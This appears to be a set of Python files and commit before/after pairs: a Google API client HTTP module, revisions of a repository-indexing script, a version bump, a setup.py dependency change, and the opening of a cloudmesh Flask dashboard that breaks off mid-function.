def __init__(self, fd, request, chunksize=DEFAULT_CHUNK_SIZE):
"""Constructor.
Args:
fd: io.Base or file object, The stream in which to write the downloaded
bytes.
request: apiclient.http.HttpRequest, the media request to perform in
chunks.
chunksize: int, File will be downloaded in chunks of this many bytes.
"""
self._fd = fd
self._request = request
self._uri = request.uri
self._chunksize = chunksize
self._progress = 0
self._total_size = None
self._done = False
def next_chunk(self):
"""Get the next chunk of the download.
Returns:
(status, done): (MediaDownloadStatus, boolean)
The value of 'done' will be True when the media has been fully
downloaded.
Raises:
apiclient.errors.HttpError if the response was not a 2xx.
httplib2.HttpLib2Error if a transport error has occured.
"""
headers = {
'range': 'bytes=%d-%d' % (
self._progress, self._progress + self._chunksize)
}
http = self._request.http
http.follow_redirects = False
resp, content = http.request(self._uri, headers=headers)
if resp.status in [301, 302, 303, 307, 308] and 'location' in resp:
self._uri = resp['location']
resp, content = http.request(self._uri, headers=headers)
if resp.status in [200, 206]:
self._progress += len(content)
self._fd.write(content)
if 'content-range' in resp:
content_range = resp['content-range']
length = content_range.rsplit('/', 1)[1]
self._total_size = int(length)
if self._progress == self._total_size:
self._done = True
return MediaDownloadProgress(self._progress, self._total_size), self._done
else:
raise HttpError(resp, content, self._uri)
class HttpRequest(object):
"""Encapsulates a single HTTP request."""
def __init__(self, http, postproc, uri,
method='GET',
body=None,
headers=None,
methodId=None,
resumable=None):
"""Constructor for an HttpRequest.
Args:
http: httplib2.Http, the transport object to use to make a request
postproc: callable, called on the HTTP response and content to transform
it into a data object before returning, or raising an exception
on an error.
uri: string, the absolute URI to send the request to
method: string, the HTTP method to use
body: string, the request body of the HTTP request,
headers: dict, the HTTP request headers
methodId: string, a unique identifier for the API method being called.
resumable: MediaUpload, None if this is not a resumbale request.
"""
self.uri = uri
self.method = method
self.body = body
self.headers = headers or {}
self.methodId = methodId
self.http = http
self.postproc = postproc
self.resumable = resumable
self._in_error_state = False
# Pull the multipart boundary out of the content-type header.
major, minor, params = mimeparse.parse_mime_type(
headers.get('content-type', 'application/json'))
# The size of the non-media part of the request.
self.body_size = len(self.body or '')
# The resumable URI to send chunks to.
self.resumable_uri = None
# The bytes that have been uploaded.
self.resumable_progress = 0
def execute(self, http=None):
"""Execute the request.
Args:
http: httplib2.Http, an http object to be used in place of the
one the HttpRequest request object was constructed with.
Returns:
A deserialized object model of the response body as determined
by the postproc.
Raises:
apiclient.errors.HttpError if the response was not a 2xx.
httplib2.HttpLib2Error if a transport error has occured.
"""
if http is None:
http = self.http
if self.resumable:
body = None
while body is None:
_, body = self.next_chunk(http)
return body
else:
if 'content-length' not in self.headers:
self.headers['content-length'] = str(self.body_size)
resp, content = http.request(self.uri, self.method,
body=self.body,
headers=self.headers)
if resp.status >= 300:
raise HttpError(resp, content, self.uri)
return self.postproc(resp, content)
def next_chunk(self, http=None):
"""Execute the next step of a resumable upload.
Can only be used if the method being executed supports media uploads and
the MediaUpload object passed in was flagged as using resumable upload.
Example:
media = MediaFileUpload('cow.png', mimetype='image/png',
chunksize=1000, resumable=True)
request = farm.animals().insert(
id='cow',
name='cow.png',
media_body=media)
response = None
while response is None:
status, response = request.next_chunk()
if status:
print "Upload %d%% complete." % int(status.progress() * 100)
Returns:
(status, body): (ResumableMediaStatus, object)
The body will be None until the resumable media is fully uploaded.
Raises:
apiclient.errors.HttpError if the response was not a 2xx.
httplib2.HttpLib2Error if a transport error has occured.
"""
if http is None:
http = self.http
if self.resumable.size() is None:
size = '*'
else:
size = str(self.resumable.size())
if self.resumable_uri is None:
start_headers = copy.copy(self.headers)
start_headers['X-Upload-Content-Type'] = self.resumable.mimetype()
if size != '*':
start_headers['X-Upload-Content-Length'] = size
start_headers['content-length'] = str(self.body_size)
resp, content = http.request(self.uri, self.method,
body=self.body,
headers=start_headers)
if resp.status == 200 and 'location' in resp:
self.resumable_uri = resp['location']
else:
raise ResumableUploadError("Failed to retrieve starting URI.")
elif self._in_error_state:
# If we are in an error state then query the server for current state of
# the upload by sending an empty PUT and reading the 'range' header in
# the response.
headers = {
'Content-Range': 'bytes */%s' % size,
'content-length': '0'
}
resp, content = http.request(self.resumable_uri, 'PUT',
headers=headers)
status, body = self._process_response(resp, content)
if body:
# The upload was complete.
return (status, body)
data = self.resumable.getbytes(
self.resumable_progress, self.resumable.chunksize())
# A short read implies that we are at EOF, so finish the upload.
if len(data) < self.resumable.chunksize():
size = str(self.resumable_progress + len(data))
headers = {
'Content-Range': 'bytes %d-%d/%s' % (
self.resumable_progress, self.resumable_progress + len(data) - 1,
size)
}
try:
resp, content = http.request(self.resumable_uri, 'PUT',
body=data,
headers=headers)
except:
self._in_error_state = True
raise
return self._process_response(resp, content)
def _process_response(self, resp, content):
"""Process the response from a single chunk upload.
Args:
resp: httplib2.Response, the response object.
content: string, the content of the response.
Returns:
(status, body): (ResumableMediaStatus, object)
The body will be None until the resumable media is fully uploaded.
Raises:
apiclient.errors.HttpError if the response was not a 2xx or a 308.
"""
if resp.status in [200, 201]:
self._in_error_state = False
return None, self.postproc(resp, content)
elif resp.status == 308:
self._in_error_state = False
# A "308 Resume Incomplete" indicates we are not done.
self.resumable_progress = int(resp['range'].split('-')[1]) + 1
if 'location' in resp:
self.resumable_uri = resp['location']
else:
self._in_error_state = True
raise HttpError(resp, content, self.uri)
return (MediaUploadProgress(self.resumable_progress, self.resumable.size()),
None)
def to_json(self):
"""Returns a JSON representation of the HttpRequest."""
d = copy.copy(self.__dict__)
if d['resumable'] is not None:
d['resumable'] = self.resumable.to_json()
del d['http']
del d['postproc']
return simplejson.dumps(d)
@staticmethod
def from_json(s, http, postproc):
"""Returns an HttpRequest populated with info from a JSON object."""
d = simplejson.loads(s)
if d['resumable'] is not None:
d['resumable'] = MediaUpload.new_from_json(d['resumable'])
return HttpRequest(
http,
postproc,
uri=d['uri'],
method=d['method'],
body=d['body'],
headers=d['headers'],
methodId=d['methodId'],
resumable=d['resumable'])
class BatchHttpRequest(object):
"""Batches multiple HttpRequest objects into a single HTTP request.
Example:
from apiclient.http import BatchHttpRequest
def list_animals(request_id, response, exception):
\"\"\"Do something with the animals list response.\"\"\"
if exception is not None:
# Do something with the exception.
pass
else:
# Do something with the response.
pass
def list_farmers(request_id, response, exception):
\"\"\"Do something with the farmers list response.\"\"\"
if exception is not None:
# Do something with the exception.
pass
else:
# Do something with the response.
pass
service = build('farm', 'v2')
batch = BatchHttpRequest()
batch.add(service.animals().list(), list_animals)
batch.add(service.farmers().list(), list_farmers)
batch.execute(http)
"""
def __init__(self, callback=None, batch_uri=None):
"""Constructor for a BatchHttpRequest.
Args:
callback: callable, A callback to be called for each response, of the
form callback(id, response, exception). The first parameter is the
request id, and the second is the deserialized response object. The
third is an apiclient.errors.HttpError exception object if an HTTP error
occurred while processing the request, or None if no error occurred.
batch_uri: string, URI to send batch requests to.
"""
if batch_uri is None:
batch_uri = 'https://www.googleapis.com/batch'
self._batch_uri = batch_uri
# Global callback to be called for each individual response in the batch.
self._callback = callback
# A map from id to request.
self._requests = {}
# A map from id to callback.
self._callbacks = {}
# List of request ids, in the order in which they were added.
self._order = []
# The last auto generated id.
self._last_auto_id = 0
# Unique ID on which to base the Content-ID headers.
self._base_id = None
# A map from request id to (httplib2.Response, content) response pairs
self._responses = {}
# A map of id(Credentials) that have been refreshed.
self._refreshed_credentials = {}
def _refresh_and_apply_credentials(self, request, http):
"""Refresh the credentials and apply to the request.
Args:
request: HttpRequest, the request.
http: httplib2.Http, the global http object for the batch.
"""
# For the credentials to refresh, but only once per refresh_token
# If there is no http per the request then refresh the http passed in
# via execute()
creds = None
if request.http is not None and hasattr(request.http.request,
'credentials'):
creds = request.http.request.credentials
elif http is not None and hasattr(http.request, 'credentials'):
creds = http.request.credentials
if creds is not None:
if id(creds) not in self._refreshed_credentials:
creds.refresh(http)
self._refreshed_credentials[id(creds)] = 1
# Only apply the credentials if we are using the http object passed in,
# otherwise apply() will get called during _serialize_request().
if request.http is None or not hasattr(request.http.request,
'credentials'):
creds.apply(request.headers)
def _id_to_header(self, id_):
"""Convert an id to a Content-ID header value.
Args:
id_: string, identifier of individual request.
Returns:
A Content-ID header with the id_ encoded into it. A UUID is prepended to
the value because Content-ID headers are supposed to be universally
unique.
"""
if self._base_id is None:
self._base_id = uuid.uuid4()
return '<%s+%s>' % (self._base_id, urllib.quote(id_))
def _header_to_id(self, header):
"""Convert a Content-ID header value to an id.
Presumes the Content-ID header conforms to the format that _id_to_header()
returns.
Args:
header: string, Content-ID header value.
Returns:
The extracted id value.
Raises:
BatchError if the header is not in the expected format.
"""
if header[0] != '<' or header[-1] != '>':
raise BatchError("Invalid value for Content-ID: %s" % header)
if '+' not in header:
raise BatchError("Invalid value for Content-ID: %s" % header)
base, id_ = header[1:-1].rsplit('+', 1)
return urllib.unquote(id_)
def _serialize_request(self, request):
"""Convert an HttpRequest object into a string.
Args:
request: HttpRequest, the request to serialize.
Returns:
The request as a string in application/http format.
"""
# Construct status line
parsed = urlparse.urlparse(request.uri)
request_line = urlparse.urlunparse(
(None, None, parsed.path, parsed.params, parsed.query, None)
)
status_line = request.method + ' ' + request_line + ' HTTP/1.1\n'
major, minor = request.headers.get('content-type', 'application/json').split('/')
msg = MIMENonMultipart(major, minor)
headers = request.headers.copy()
if request.http is not None and hasattr(request.http.request,
'credentials'):
request.http.request.credentials.apply(headers)
# MIMENonMultipart adds its own Content-Type header.
if 'content-type' in headers:
del headers['content-type']
for key, value in headers.iteritems():
msg[key] = value
msg['Host'] = parsed.netloc
msg.set_unixfrom(None)
if request.body is not None:
msg.set_payload(request.body)
msg['content-length'] = str(len(request.body))
# Serialize the mime message.
fp = StringIO.StringIO()
# maxheaderlen=0 means don't line wrap headers.
g = Generator(fp, maxheaderlen=0)
g.flatten(msg, unixfrom=False)
body = fp.getvalue()
# Strip off the \n\n that the MIME lib tacks onto the end of the payload.
if request.body is None:
body = body[:-2]
return status_line.encode('utf-8') + body
def _deserialize_response(self, payload):
"""Convert string into httplib2 response and content.
Args:
payload: string, headers and body as a string.
Returns:
A pair (resp, content), such as would be returned from httplib2.request.
"""
# Strip off the status line
status_line, payload = payload.split('\n', 1)
protocol, status, reason = status_line.split(' ', 2)
# Parse the rest of the response
parser = FeedParser()
parser.feed(payload)
msg = parser.close()
msg['status'] = status
# Create httplib2.Response from the parsed headers.
resp = httplib2.Response(msg)
resp.reason = reason
resp.version = int(protocol.split('/', 1)[1].replace('.', ''))
content = payload.split('\r\n\r\n', 1)[1]
return resp, content
def _new_id(self):
"""Create a new id.
Auto incrementing number that avoids conflicts with ids already used.
Returns:
string, a new unique id.
"""
self._last_auto_id += 1
while str(self._last_auto_id) in self._requests:
self._last_auto_id += 1
return str(self._last_auto_id)
def add(self, request, callback=None, request_id=None):
"""Add a new request.
Every callback added will be paired with a unique id, the request_id. That
unique id will be passed back to the callback when the response comes back
from the server. The default behavior is to have the library generate it's
own unique id. If the caller passes in a request_id then they must ensure
uniqueness for each request_id, and if they are not an exception is
raised. Callers should either supply all request_ids or nevery supply a
request id, to avoid such an error.
Args:
request: HttpRequest, Request to add to the batch.
callback: callable, A callback to be called for this response, of the
form callback(id, response, exception). The first parameter is the
request id, and the second is the deserialized response object. The
third is an apiclient.errors.HttpError exception object if an HTTP error
occurred while processing the request, or None if no errors occurred.
request_id: string, A unique id for the request. The id will be passed to
the callback with the response.
Returns:
None
Raises:
BatchError if a media request is added to a batch.
KeyError is the request_id is not unique.
"""
if request_id is None:
request_id = self._new_id()
if request.resumable is not None:
raise BatchError("Media requests cannot be used in a batch request.")
if request_id in self._requests:
raise KeyError("A request with this ID already exists: %s" % request_id)
self._requests[request_id] = request
self._callbacks[request_id] = callback
self._order.append(request_id)
def _execute(self, http, order, requests):
"""Serialize batch request, send to server, process response.
Args:
http: httplib2.Http, an http object to be used to make the request with.
order: list, list of request ids in the order they were added to the
batch.
request: list, list of request objects to send.
Raises:
httplib2.HttpLib2Error if a transport error has occured.
apiclient.errors.BatchError if the response is the wrong format.
"""
message = MIMEMultipart('mixed')
# Message should not write out it's own headers.
setattr(message, '_write_headers', lambda self: None)
# Add all the individual requests.
for request_id in order:
request = requests[request_id]
msg = MIMENonMultipart('application', 'http')
msg['Content-Transfer-Encoding'] = 'binary'
msg['Content-ID'] = self._id_to_header(request_id)
body = self._serialize_request(request)
msg.set_payload(body)
message.attach(msg)
body = message.as_string()
headers = {}
headers['content-type'] = ('multipart/mixed; '
'boundary="%s"') % message.get_boundary()
resp, content = http.request(self._batch_uri, 'POST', body=body,
headers=headers)
if resp.status >= 300:
raise HttpError(resp, content, self._batch_uri)
# Now break out the individual responses and store each one.
boundary, _ = content.split(None, 1)
# Prepend with a content-type header so FeedParser can handle it.
header = 'content-type: %s\r\n\r\n' % resp['content-type']
for_parser = header + content
parser = FeedParser()
parser.feed(for_parser)
mime_response = parser.close()
if not mime_response.is_multipart():
raise BatchError("Response not in multipart/mixed format.", resp,
content)
for part in mime_response.get_payload():
request_id = self._header_to_id(part['Content-ID'])
response, content = self._deserialize_response(part.get_payload())
self._responses[request_id] = (response, content)
def execute(self, http=None):
"""Execute all the requests as a single batched HTTP request.
Args:
http: httplib2.Http, an http object to be used in place of the one the
HttpRequest request object was constructed with. If one isn't supplied
then use a http object from the requests in this batch.
Returns:
None
Raises:
httplib2.HttpLib2Error if a transport error has occured.
apiclient.errors.BatchError if the response is the wrong format.
"""
# If http is not supplied use the first valid one given in the requests.
if http is None:
for request_id in self._order:
request = self._requests[request_id]
if request is not None:
http = request.http
break
if http is None:
raise ValueError("Missing a valid http object.")
self._execute(http, self._order, self._requests)
# Loop over all the requests and check for 401s. For each 401 request the
# credentials should be refreshed and then sent again in a separate batch.
redo_requests = {}
redo_order = []
for request_id in self._order:
resp, content = self._responses[request_id]
if resp['status'] == '401':
redo_order.append(request_id)
request = self._requests[request_id]
self._refresh_and_apply_credentials(request, http)
redo_requests[request_id] = request
if redo_requests:
self._execute(http, redo_order, redo_requests)
# Now process all callbacks that are erroring, and raise an exception for
# ones that return a non-2xx response? Or add extra parameter to callback
# that contains an HttpError?
for request_id in self._order:
resp, content = self._responses[request_id]
request = self._requests[request_id]
callback = self._callbacks[request_id]
response = None
exception = None
try:
if resp.status >= 300:
raise HttpError(resp, content, request.uri)
response = request.postproc(resp, content)
except HttpError, e:
exception = e
if callback is not None:
callback(request_id, response, exception)
if self._callback is not None:
self._callback(request_id, response, exception)
class HttpRequestMock(object):
"""Mock of HttpRequest.
Do not construct directly, instead use RequestMockBuilder.
"""
def __init__(self, resp, content, postproc):
"""Constructor for HttpRequestMock
Args:
resp: httplib2.Response, the response to emulate coming from the request
content: string, the response body
postproc: callable, the post processing function usually supplied by
the model class. See model.JsonModel.response() as an example.
"""
self.resp = resp
self.content = content
self.postproc = postproc
if resp is None:
self.resp = httplib2.Response({'status': 200, 'reason': 'OK'})
if 'reason' in self.resp:
self.resp.reason = self.resp['reason']
def execute(self, http=None):
"""Execute the request.
Same behavior as HttpRequest.execute(), but the response is
mocked and not really from an HTTP request/response.
"""
return self.postproc(self.resp, self.content)
class RequestMockBuilder(object):
"""A simple mock of HttpRequest
Pass in a dictionary to the constructor that maps request methodIds to
tuples of (httplib2.Response, content, opt_expected_body) that should be
returned when that method is called. None may also be passed in for the
httplib2.Response, in which case a 200 OK response will be generated.
If an opt_expected_body (str or dict) is provided, it will be compared to
the body and UnexpectedBodyError will be raised on inequality.
Example:
response = '{"data": {"id": "tag:google.c...'
requestBuilder = RequestMockBuilder(
{
'plus.activities.get': (None, response),
}
)
apiclient.discovery.build("plus", "v1", requestBuilder=requestBuilder)
Methods that you do not supply a response for will return a
200 OK with an empty string as the response content or raise an excpetion
if check_unexpected is set to True. The methodId is taken from the rpcName
in the discovery document.
For more details see the project wiki.
"""
def __init__(self, responses, check_unexpected=False):
"""Constructor for RequestMockBuilder
The constructed object should be a callable object
that can replace the class HttpResponse.
responses - A dictionary that maps methodIds into tuples
of (httplib2.Response, content). The methodId
comes from the 'rpcName' field in the discovery
document.
check_unexpected - A boolean setting whether or not UnexpectedMethodError
should be raised on unsupplied method.
"""
self.responses = responses
self.check_unexpected = check_unexpected
def __call__(self, http, postproc, uri, method='GET', body=None,
headers=None, methodId=None, resumable=None):
"""Implements the callable interface that discovery.build() expects
of requestBuilder, which is to build an object compatible with
HttpRequest.execute(). See that method for the description of the
parameters and the expected response.
"""
if methodId in self.responses:
response = self.responses[methodId]
resp, content = response[:2]
if len(response) > 2:
# Test the body against the supplied expected_body.
expected_body = response[2]
if bool(expected_body) != bool(body):
# Not expecting a body and provided one
# or expecting a body and not provided one.
raise UnexpectedBodyError(expected_body, body)
if isinstance(expected_body, str):
expected_body = simplejson.loads(expected_body)
body = simplejson.loads(body)
if body != expected_body:
raise UnexpectedBodyError(expected_body, body)
return HttpRequestMock(resp, content, postproc)
elif self.check_unexpected:
raise UnexpectedMethodError(methodId)
else:
model = JsonModel(False)
return HttpRequestMock(None, '{}', model.response)
class HttpMock(object):
"""Mock of httplib2.Http"""
def __init__(self, filename, headers=None):
"""
Args:
filename: string, absolute filename to read response from
headers: dict, header to return with response
"""
if headers is None:
headers = {'status': '200 OK'}
f = file(filename, 'r')
self.data = f.read()
f.close()
self.headers = headers
def request(self, uri,
method='GET',
body=None,
headers=None,
redirections=1,
connection_type=None):
return httplib2.Response(self.headers), self.data
class HttpMockSequence(object):
"""Mock of httplib2.Http
Mocks a sequence of calls to request returning different responses for each
call. Create an instance initialized with the desired response headers
and content and then use as if an httplib2.Http instance.
http = HttpMockSequence([
({'status': '401'}, ''),
({'status': '200'}, '{"access_token":"1/3w","expires_in":3600}'),
({'status': '200'}, 'echo_request_headers'),
])
resp, content = http.request("http://examples.com")
There are special values you can pass in for content to trigger
behavours that are helpful in testing.
'echo_request_headers' means return the request headers in the response body
'echo_request_headers_as_json' means return the request headers in
the response body
'echo_request_body' means return the request body in the response body
'echo_request_uri' means return the request uri in the response body
"""
def __init__(self, iterable):
"""
Args:
iterable: iterable, a sequence of pairs of (headers, body)
"""
self._iterable = iterable
self.follow_redirects = True
def request(self, uri,
method='GET',
body=None,
headers=None,
redirections=1,
connection_type=None):
resp, content = self._iterable.pop(0)
if content == 'echo_request_headers':
content = headers
elif content == 'echo_request_headers_as_json':
content = simplejson.dumps(headers)
elif content == 'echo_request_body':
content = body
elif content == 'echo_request_uri':
content = uri
return httplib2.Response(resp), content
def set_user_agent(http, user_agent):
"""Set the user-agent on every request.
Args:
http - An instance of httplib2.Http
or something that acts like it.
user_agent: string, the value for the user-agent header.
Returns:
A modified instance of http that was passed in.
Example:
h = httplib2.Http()
h = set_user_agent(h, "my-app-name/6.0")
Most of the time the user-agent will be set doing auth, this is for the rare
cases where you are accessing an unauthenticated endpoint.
"""
request_orig = http.request
# The closure that will replace 'httplib2.Http.request'.
def new_request(uri, method='GET', body=None, headers=None,
redirections=httplib2.DEFAULT_MAX_REDIRECTS,
connection_type=None):
"""Modify the request headers to add the user-agent."""
if headers is None:
headers = {}
if 'user-agent' in headers:
headers['user-agent'] = user_agent + ' ' + headers['user-agent']
else:
headers['user-agent'] = user_agent
resp, content = request_orig(uri, method, body, headers,
redirections, connection_type)
return resp, content
http.request = new_request
return http
def tunnel_patch(http):
"""Tunnel PATCH requests over POST.
Args:
http - An instance of httplib2.Http
or something that acts like it.
Returns:
A modified instance of http that was passed in.
Example:
h = httplib2.Http()
h = tunnel_patch(h, "my-app-name/6.0")
Useful if you are running on a platform that doesn't support PATCH.
Apply this last if you are using OAuth 1.0, as changing the method
will result in a different signature.
"""
request_orig = http.request
# The closure that will replace 'httplib2.Http.request'.
def new_request(uri, method='GET', body=None, headers=None,
redirections=httplib2.DEFAULT_MAX_REDIRECTS,
connection_type=None):
"""Modify the request headers to add the user-agent."""
if headers is None:
headers = {}
if method == 'PATCH':
if 'oauth_token' in headers.get('authorization', ''):
logging.warning(
'OAuth 1.0 request made with Credentials after tunnel_patch.')
headers['x-http-method-override'] = "PATCH"
method = 'POST'
resp, content = request_orig(uri, method, body, headers,
redirections, connection_type)
return resp, content
http.request = new_request
return http
|
#!/usr/bin/env python
'''
Generates the repos.yaml file used by the indexer.
Sample usage:
find /path/to/repositories/ -maxdepth 1 -type d | ./repos.py > repos.yaml
'''
import git
import os
import re
from site_extensions import (NotProjectError, get_project_name, site_action,
site_initial_action)
import sys
import yaml
def main():
current_dir = os.path.dirname(os.path.abspath(__file__))
with open(os.path.join(current_dir, 'config.yaml')) as f:
config = yaml.load(f)
site_initial_action(config)
repo_regex = re.compile(config['project_re'])
repos = []
for line in sys.stdin:
abspath = line.strip()
if not os.path.isdir(abspath):
continue
try:
git.Repo(abspath)
except git.errors.InvalidGitRepositoryError:
# The line is not a git repository. Skip it.
continue
try:
project = get_project_name(abspath, repo_regex)
except NotProjectError:
continue
try:
site_action(abspath, config, repo_regex)
except NotProjectError:
continue
repos.append({'abspath': abspath, 'project': project})
print yaml.dump(repos, default_flow_style=False)
if __name__ == '__main__':
main()
git.errors changed to git.exc
#!/usr/bin/env python
'''
Generates the repos.yaml file used by the indexer.
Sample usage:
find /path/to/repositories/ -maxdepth 1 -type d | ./repos.py > repos.yaml
'''
import git
import os
import re
from site_extensions import (NotProjectError, get_project_name, site_action,
site_initial_action)
import sys
import yaml
def main():
current_dir = os.path.dirname(os.path.abspath(__file__))
with open(os.path.join(current_dir, 'config.yaml')) as f:
config = yaml.load(f)
site_initial_action(config)
repo_regex = re.compile(config['project_re'])
repos = []
for line in sys.stdin:
abspath = line.strip()
if not os.path.isdir(abspath):
continue
try:
git.Repo(abspath)
except git.exc.InvalidGitRepositoryError:
# The line is not a git repository. Skip it.
continue
try:
project = get_project_name(abspath, repo_regex)
except NotProjectError:
continue
try:
site_action(abspath, config, repo_regex)
except NotProjectError:
continue
repos.append({'abspath': abspath, 'project': project})
print yaml.dump(repos, default_flow_style=False)
if __name__ == '__main__':
main()
|
#!/usr/bin/env python
'''
Generates the repos.yaml file used by the indexer.
Sample usage:
find /path/to/repositories/ -maxdepth 1 -type d | ./repos.py > repos.yaml
'''
import git
import os
import re
from site_extensions import (NotProjectError, get_project_name, site_action,
site_initial_action)
import sys
import yaml
def main():
current_dir = os.path.dirname(os.path.abspath(__file__))
with open(os.path.join(current_dir, 'config.yaml')) as f:
config = yaml.load(f)
site_initial_action(config)
repo_regex = re.compile(config['project_re'])
repos = []
for line in sys.stdin:
abspath = line.strip()
if not os.path.isdir(abspath):
continue
try:
repo = git.Repo(abspath)
except git.exc.InvalidGitRepositoryError:
# The line is not a git repository. Skip it.
continue
if 'master' not in repo.heads:
continue
try:
project = get_project_name(abspath, repo_regex)
except NotProjectError:
continue
try:
site_action(abspath, config, repo_regex)
except NotProjectError:
continue
repos.append({'abspath': abspath, 'project': project})
print yaml.dump(repos, default_flow_style=False)
if __name__ == '__main__':
main()
The other file has the testing shebang
#!/opt/Python-2.7.8-empty/bin/python
import sys
sys.path.insert(0, '/opt/codesearch_local_root/dependencies')
'''
Generates the repos.yaml file used by the indexer.
Sample usage:
find /path/to/repositories/ -maxdepth 1 -type d | ./repos.py > repos.yaml
'''
import git
import os
import re
from site_extensions import (NotProjectError, get_project_name, site_action,
site_initial_action)
import sys
import yaml
def main():
current_dir = os.path.dirname(os.path.abspath(__file__))
with open(os.path.join(current_dir, 'config.yaml')) as f:
config = yaml.load(f)
site_initial_action(config)
repo_regex = re.compile(config['project_re'])
repos = []
for line in sys.stdin:
abspath = line.strip()
if not os.path.isdir(abspath):
continue
try:
repo = git.Repo(abspath)
except git.exc.InvalidGitRepositoryError:
# The line is not a git repository. Skip it.
continue
if 'master' not in repo.heads:
continue
try:
project = get_project_name(abspath, repo_regex)
except NotProjectError:
continue
try:
site_action(abspath, config, repo_regex)
except NotProjectError:
continue
repos.append({'abspath': abspath, 'project': project})
print yaml.dump(repos, default_flow_style=False)
if __name__ == '__main__':
main()
|
#
__version__ = '1.6'
Update to 1.7 for the next release.
#
__version__ = '1.7'
|
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
with open('README.rst') as f:
readme = f.read()
with open('LICENSE') as f:
license = f.read()
setup(
name='nickITAPI',
version='0.1.1',
description='',
long_description=readme,
author='digIT',
# author_email='',
# url='',
license=license,
packages=find_packages(exclude=('tests', 'docs')),
install_requires=['flask', 'requests',]
)
Add ldap3 to required modules
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
with open('README.rst') as f:
readme = f.read()
with open('LICENSE') as f:
license = f.read()
setup(
name='nickITAPI',
version='0.1.1',
description='',
long_description=readme,
author='digIT',
# author_email='',
# url='',
license=license,
packages=find_packages(exclude=('tests', 'docs')),
install_requires=['flask', 'requests', 'ldap3']
)
|
import sys
sys.path.insert(0, './')
sys.path.insert(0, '../')
import os
import time
from flask import Flask, render_template, request
from flask_flatpages import FlatPages
from cloudmesh.cloudmesh import cloudmesh
from datetime import datetime
from cloudmesh.cm_config import cm_config
from datetime import datetime
import yaml
#### setting up reading path for the use of yaml################
default_path = '.futuregrid/cloudmesh.yaml'
home = os.environ['HOME']
filename = "%s/%s" % (home, default_path)
#### end of setting up reading path for the use of yaml################
DEBUG = True
FLATPAGES_AUTO_RELOAD = DEBUG
FLATPAGES_EXTENSION = '.md'
"""
import pkg_resources
version = pkg_resources.get_distribution("flask_cm").version
"""
version = "0.7.2"
clouds = cloudmesh()
clouds.refresh()
# clouds.load()
# AttributeError: cloudmesh instance has no attribute 'refresh'
# clouds.refresh()
# TEST CASE
######################################################################
# STARTING THE FLASK APP
######################################################################
app = Flask(__name__)
app.config.from_object(__name__)
pages = FlatPages(app)
######################################################################
# ACTIVATE STRUCTURE
######################################################################
def make_active(name):
active = {'home': "",
'table': "",
'contact': "",
'flavors': "",
'images': "",
'metric': "",
'profile': "",
'vm_info': "",
'projects': ""}
active[name] = 'active'
return active
######################################################################
# ROUTE: /
######################################################################
@app.route('/')
def index():
active = make_active('home')
return render_template('index.html',
pages=pages,
active=active,
version=version)
######################################################################
# ROUTE: REFRESH
######################################################################
@app.route('/cm/refresh/')
@app.route('/cm/refresh/<cloud>/')
def refresh(cloud=None, server=None):
print "-> refresh", cloud, server
global clouds
clouds.refresh()
return table()
######################################################################
# ROUTE: KILL
######################################################################
@app.route('/cm/kill/')
def kill_vms():
print "-> kill all"
r = cm("--set", "quiet", "kill", _tty_in=True)
return table()
######################################################################
# ROUTE: DELETE
######################################################################
@app.route('/cm/delete/<cloud>/<server>/')
def delete_vm(cloud=None, server=None):
print "-> delete", cloud, server
# if (cloud == 'india'):
# r = cm("--set", "quiet", "delete:1", _tty_in=True)
clouds.delete(cloud, server)
time.sleep(5)
global clouds
clouds.refresh()
return table()
######################################################################
# ROUTE: START
######################################################################
@app.route('/cm/start/<cloud>/')
def start_vm(cloud=None, server=None):
print "*********** STARTVM", cloud
print "-> start", cloud, server
# if (cloud == 'india'):
# r = cm("--set", "quiet", "start:1", _tty_in=True)
clouds.create(cloud, "gvonlasz", "001", "dummy")
return table()
'''
#gregorss test
@app.route('/cm/metric/<startdate>/<enddate>/<host>')
def list_metric(cloud=None, server=None):
print "-> generate metric", startdate, endadte
#r = fg-metric(startdate, enddate, host, _tty_in=True)
return render_template('metric1.html',
startdate=startdate,
active=active,
version=version,
endate=enddate)
#return table()
'''
######################################################################
# ROUTE: SAVE
######################################################################
@app.route('/save/')
def save():
print "Saving the cloud status"
global clouds
clouds.save()
return table()
######################################################################
# ROUTE: LOAD
######################################################################
@app.route('/load/')
def load():
print "Loading the cloud status"
global clouds
clouds.load()
return table()
######################################################################
# ROUTE: TABLE
######################################################################
@app.route('/table/')
def table():
global clouds
active = make_active('table')
time_now = datetime.now().strftime("%Y-%m-%d %H:%M")
# clouds.refresh("sierra-openstack")
# note thet call to sierra is fake it just goes to india and sets cloudname to sierra.
# clouds.dump()
# keys = clouds.get_keys()
return render_template('table.html',
updated=time_now,
keys="", # ",".join(clouds.get_keys()),
clouds=clouds.clouds,
image='myimage',
pages=pages,
active=active,
version=version)
######################################################################
# ROUTE: PROJECTS
######################################################################
@app.route('/projects/')
def project():
global projects;
active = make_active('projects')
config = cm_config()
dict_t = config.get()
makeCloudDict(dict_t) #from the profile function
return render_template('projects.html',
clouds=projects,
active=active,
version=version)
######################################################################
# ROUTE: VM INFO
######################################################################
@app.route('/cm/info/<cloud>/<server>/')
def vm_info(cloud=None,server=None):
global clouds
active = make_active('vm_info')
time_now = datetime.now().strftime("%Y-%m-%d %H:%M")
return render_template('vm_info.html',
updated=time_now,
keys="",
server=clouds.clouds[cloud]['servers'][server],
id = server,
cloudname = cloud,
active=active,
version=version,
table_fun=maketablefromdict )
def maketablefromdict(the_dict):
return_str = ''
if isinstance(the_dict, dict):
for name,value in the_dict.iteritems() :
return_str =return_str +'<tr><td>'+name.title() +'</td><td>'+str(maketablefromdict(value))+'</td></tr>'
return_str = '<table>' + return_str + '</table>'
return return_str
elif type(the_dict) is list:
for element in the_dict:
for name,value in element.iteritems() :
return_str =return_str +'<tr><td>'+name.title()+'</td><td>'+str(maketablefromdict(value))+'</td></tr>'
return_str = '<table>' + return_str + '</table>'
return return_str
else:
return the_dict
######################################################################
# ROUTE: FLAVOR
######################################################################
def set_default_flavor(name, flavor_names):
global default_flavor;
default_flavor = name
selected = {}
for name in flavor_names:
selected[name] = ""
selected[default_flavor] = 'checked'
return selected
default_flavor = "m1.small"
def buildFlavorNamesArray(clouds):
flavor_names=[]
for name, cloud in clouds.iteritems():
for id, flavor in cloud['flavors'].iteritems():
flavor_names.append(flavor['name']);
return flavor_names;
#@app.route('/flavors/<cloud>/' )
@app.route('/flavors/', methods=['GET','POST'])
def display_flavors(cloud=None):
flavor_names=buildFlavorNamesArray(clouds.clouds);
# for debugging
cloud = 'india-openstack'
